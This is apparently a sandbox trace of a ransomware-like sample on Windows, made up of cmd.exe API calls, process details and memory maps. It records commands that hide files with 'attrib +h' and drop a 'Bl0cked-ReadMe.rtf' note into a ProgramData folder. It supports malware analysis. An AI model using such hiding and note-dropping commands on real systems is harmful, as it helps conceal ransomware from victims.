FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.147] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.148] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.148] GetConsoleTitleW (in: lpConsoleTitle=0x12f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.148] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f01c | out: lpAttributeList=0x12ef54, lpSize=0x12f01c) returned 1 [0206.148] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef54, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f014, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef54, lpPreviousValue=0x0) returned 1 [0206.148] GetStartupInfoW (in: lpStartupInfo=0x12ef10 | out: lpStartupInfo=0x12ef10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0206.148] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.148] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12efb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12effc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessInformation=0x12effc*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa08, dwThreadId=0xfb4)) returned 1 [0206.240] CloseHandle (hObject=0x50) returned 1 [0206.240] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.240] GetEnvironmentStringsW () returned 0x2c2d50* [0206.240] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.240] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0206.523] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12eef0 | out: lpExitCode=0x12eef0*=0x0) returned 1 [0206.523] CloseHandle (hObject=0x4c) returned 1 [0206.523] _vsnwprintf (in: _Buffer=0x12f038, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eefc | out: _Buffer="00000000") returned 8 [0206.523] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.523] GetEnvironmentStringsW () returned 0x2c2d50* [0206.523] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.523] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.523] GetEnvironmentStringsW () returned 0x2c2d50* [0206.523] FreeEnvironmentStringsW (penv=0x2c2d50) returned 1 [0206.523] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef54 | out: lpAttributeList=0x12ef54) [0206.523] GetConsoleTitleW (in: lpConsoleTitle=0x12f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.524] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0206.524] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.524] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.524] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.524] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.524] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.524] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.524] GetConsoleTitleW (in: lpConsoleTitle=0x12f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.524] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f01c | out: lpAttributeList=0x12ef54, lpSize=0x12f01c) returned 1 [0206.525] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef54, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f014, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef54, lpPreviousValue=0x0) returned 1 [0206.525] GetStartupInfoW (in: lpStartupInfo=0x12ef10 | out: lpStartupInfo=0x12ef10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0206.525] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.525] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12efb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12effc | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessInformation=0x12effc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd88, dwThreadId=0x720)) returned 1 [0206.526] CloseHandle (hObject=0x4c) returned 1 [0206.526] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.526] GetEnvironmentStringsW () returned 0x2c3790* [0206.526] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.527] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0206.657] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eef0 | out: lpExitCode=0x12eef0*=0x0) returned 1 [0206.657] CloseHandle (hObject=0x50) returned 1 [0206.657] _vsnwprintf (in: _Buffer=0x12f038, _BufferCount=0x13, _Format="%08X", _ArgList=0x12eefc | out: _Buffer="00000000") returned 8 [0206.657] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0206.657] GetEnvironmentStringsW () returned 0x2c3790* [0206.657] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.657] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.657] GetEnvironmentStringsW () returned 0x2c3790* [0206.657] FreeEnvironmentStringsW (penv=0x2c3790) returned 1 [0206.657] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ef54 | out: lpAttributeList=0x12ef54) [0206.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0206.657] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0206.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0206.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0206.658] _get_osfhandle (_FileHandle=0) returned 0x3 [0206.658] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0206.658] SetConsoleInputExeNameW () returned 0x1 [0206.658] GetConsoleOutputCP () returned 0x1b5 [0206.658] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0206.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.658] exit (_Code=0) Process: id = "495" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30297 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30298 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 30299 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30304 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 30305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30365 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30366 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30367 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30368 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30369 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 30370 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30371 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30372 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30373 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30374 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30375 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30376 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30377 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30378 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30379 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 30380 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30381 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30382 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30383 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30384 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30385 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 30386 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30387 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30388 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 691 os_tid = 0x978 [0205.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f904 | out: lpSystemTimeAsFileTime=0x12f904*(dwLowDateTime=0xaf49e020, dwHighDateTime=0x1d440a9)) [0205.488] GetCurrentProcessId () returned 0xf2c [0205.488] GetCurrentThreadId () returned 0x978 [0205.488] GetTickCount () returned 0x39e03 [0205.488] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8fc | out: lpPerformanceCount=0x12f8fc*=26227737553) returned 1 [0205.489] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.489] __set_app_type (_Type=0x1) [0205.489] __p__fmode () returned 0x76b331f4 [0205.489] __p__commode () returned 0x76b331fc [0205.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.489] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.489] GetCurrentThreadId () returned 0x978 [0205.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x978) returned 0x38 [0205.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.489] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.490] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f894 | out: phkResult=0x12f894*=0x0) returned 0x2 [0205.490] VirtualQuery (in: lpAddress=0x12f8cb, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.490] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.490] GetConsoleOutputCP () returned 0x1b5 [0205.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.491] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.491] GetEnvironmentStringsW () returned 0x250190* [0205.491] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0205.491] GetEnvironmentStringsW () returned 0x250190* [0205.491] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0205.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0205.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0xb8, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegCloseKey (hKey=0x40) returned 0x0 [0205.492] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0205.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x1000) returned 0x2 [0205.492] RegCloseKey (hKey=0x40) returned 0x0 [0205.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.492] srand (_Seed=0x5b8863a7) [0205.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" [0205.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf\"" [0205.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.493] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.493] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.493] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.493] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.493] GetEnvironmentStringsW () returned 0x2522e0* [0205.493] FreeEnvironmentStringsW (penv=0x2522e0) returned 1 [0205.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.494] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.494] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.494] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5d0 | out: 